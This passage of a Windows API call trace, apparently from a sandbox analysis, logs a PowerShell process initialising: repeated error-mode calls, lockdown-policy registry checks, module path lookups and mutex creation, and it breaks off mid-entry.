[0281.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.844] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff8c0 [0281.844] GetSystemDirectoryW (in: lpBuffer=0x25b73cff8c0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0281.844] CoTaskMemFree (pv=0x25b73cff8c0) [0281.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0281.845] WldpGetLockdownPolicy () returned 0x0 [0281.845] GetSystemInfo (in: lpSystemInfo=0x653ef8cb70 | out: lpSystemInfo=0x653ef8cb70*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0281.845] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8ca78 | out: phkResult=0x653ef8ca78*=0x950) returned 0x0 [0281.845] RegQueryValueExW (in: hKey=0x950, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8cac8, lpData=0x0, lpcbData=0x653ef8cac0*=0x0 | out: lpType=0x653ef8cac8*=0x0, lpData=0x0, lpcbData=0x653ef8cac0*=0x0) returned 0x2 [0281.845] RegCloseKey (hKey=0x950) returned 0x0 [0281.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0281.847] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfd8e0 [0281.847] GetSystemDirectoryW (in: lpBuffer=0x25b73cfd8e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0281.847] CoTaskMemFree (pv=0x25b73cfd8e0) [0281.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0281.847] WldpGetLockdownPolicy () returned 0x0 [0281.847] GetSystemInfo (in: lpSystemInfo=0x653ef8c9d0 | out: lpSystemInfo=0x653ef8c9d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0281.847] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8c8d8 | out: phkResult=0x653ef8c8d8*=0x954) returned 0x0 [0281.847] RegQueryValueExW (in: hKey=0x954, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8c928, lpData=0x0, lpcbData=0x653ef8c920*=0x0 | out: lpType=0x653ef8c928*=0x0, lpData=0x0, lpcbData=0x653ef8c920*=0x0) returned 0x2 [0281.847] RegCloseKey (hKey=0x954) returned 0x0 [0281.847] CloseHandle (hObject=0x950) returned 1 [0281.848] CoCreateGuid (in: pguid=0x653ef8ca88 | out: pguid=0x653ef8ca88*(Data1=0x69a5abfb, Data2=0x156, Data3=0x4ccc, Data4=([0]=0xa1, [1]=0x93, [2]=0x89, [3]=0x3d, [4]=0x3b, [5]=0x91, [6]=0x4f, [7]=0x3e))) returned 0x0 [0282.123] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en-US\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en-us\\microsoft.powershell.management.psd1")) returned 0xffffffff [0282.123] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en\\microsoft.powershell.management.psd1")) returned 0xffffffff [0282.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8b650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0282.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x653ef8b610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0282.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x653ef8b650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x66 [0282.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8baa0) returned 1 [0282.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x653ef8bb80 | out: lpFileInformation=0x653ef8bb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0282.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ba60) returned 1 [0282.127] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0282.127] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0282.127] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfac40 [0282.127] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfac40, nSize=0x105 | out: lpBuffer="") returned 0x97 [0282.127] CoTaskMemFree (pv=0x25b73cfac40) [0282.128] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8b410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0282.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b860) returned 1 [0282.128] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b940 | out: lpFileInformation=0x653ef8b940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0282.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b820) returned 1 [0282.129] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0282.146] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8b410, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0282.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b860) returned 1 [0282.146] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b940 | out: lpFileInformation=0x653ef8b940*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0282.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b820) returned 1 [0282.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8b410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0282.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b860) returned 1 [0282.147] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b940 | out: lpFileInformation=0x653ef8b940*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0282.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b820) returned 1 [0282.147] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0x653ef8b270, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x53 [0282.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b6c0) returned 1 [0282.147] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b7a0 | out: lpFileInformation=0x653ef8b7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0282.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b680) returned 1 [0282.150] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0282.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0x653ef8b270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x5b [0282.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b6c0) returned 1 [0282.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b7a0 | out: lpFileInformation=0x653ef8b7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0282.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b680) returned 1 [0282.154] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0282.156] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0282.156] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.156] CoTaskMemFree (pv=0x25b73d007a0) [0282.156] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.156] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01ce0 [0282.156] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01ce0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.156] CoTaskMemFree (pv=0x25b73d01ce0) [0282.156] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfc3a0 [0282.156] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfc3a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.157] CoTaskMemFree (pv=0x25b73cfc3a0) [0282.157] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.157] GetCurrentProcess () returned 0xffffffffffffffff [0282.157] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8c9e8 | out: TokenHandle=0x653ef8c9e8*=0x950) returned 1 [0282.158] GetTokenInformation (in: TokenHandle=0x950, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8cae8 | out: TokenInformation=0x0, ReturnLength=0x653ef8cae8) returned 0 [0282.159] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73985070 [0282.159] GetTokenInformation (in: TokenHandle=0x950, TokenInformationClass=0x1, TokenInformation=0x25b73985070, TokenInformationLength=0x2c, ReturnLength=0x653ef8cae8 | out: TokenInformation=0x25b73985070, ReturnLength=0x653ef8cae8) returned 1 [0282.159] LocalFree (hMem=0x25b73985070) returned 0x0 [0282.160] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c6e58c8, cbSid=0x653ef8cae0 | out: pSid=0x25b5c6e58c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8cae0) returned 1 [0282.160] CreateMutexW (lpMutexAttributes=0x25b5c6e5a18, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x954 [0282.161] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8c980*=0x954, lpdwindex=0x653ef8c754 | out: lpdwindex=0x653ef8c754) returned 0x0 [0282.162] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc7e0 [0282.162] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc7e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.162] CoTaskMemFree (pv=0x25b73cfc7e0) [0282.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0282.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0282.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c6e60c0 | out: lpFileInformation=0x25b5c6e60c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0282.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0282.162] ReleaseMutex (hMutex=0x954) returned 1 [0282.163] GetCurrentProcess () returned 0xffffffffffffffff [0282.163] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8cb18 | out: TokenHandle=0x653ef8cb18*=0x958) returned 1 [0282.163] GetTokenInformation (in: TokenHandle=0x958, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8cc18 | out: TokenInformation=0x0, ReturnLength=0x653ef8cc18) returned 0 [0282.163] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984bb0 [0282.163] GetTokenInformation (in: TokenHandle=0x958, TokenInformationClass=0x1, TokenInformation=0x25b73984bb0, TokenInformationLength=0x2c, ReturnLength=0x653ef8cc18 | out: TokenInformation=0x25b73984bb0, ReturnLength=0x653ef8cc18) returned 1 [0282.164] LocalFree (hMem=0x25b73984bb0) returned 0x0 [0282.164] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c6e6d58, cbSid=0x653ef8cc10 | out: pSid=0x25b5c6e6d58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8cc10) returned 1 [0282.165] CreateMutexW (lpMutexAttributes=0x25b5c6e6ea8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x95c [0282.165] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8cab0*=0x95c, lpdwindex=0x653ef8c884 | out: lpdwindex=0x653ef8c884) returned 0x0 [0282.204] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfcc20 [0282.204] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfcc20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.204] CoTaskMemFree (pv=0x25b73cfcc20) [0282.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0282.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cb40) returned 1 [0282.204] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c704168 | out: 